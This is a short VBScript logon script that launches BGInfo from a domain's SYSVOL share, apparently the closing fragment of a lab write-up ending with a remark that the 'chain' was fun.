Option Explicit

Dim objShell, bgInfoPath, bgInfoConfigPath

Set objShell = CreateObject("WScript.Shell")
bgInfoPath = "\\heron.vl\SYSVOL\heron.vl\scripts\Bginfo64.exe"
bgInfoConfigPath = "\\heron.vl\SYSVOL\heron.vl\scripts\bginfo.bgi"
objShell.Run """" & bgInfoPath & """ """ & bgInfoConfigPath & """ /timer:0", 0, True
Set objShell = Nothing


 

This chain was really fun 🙂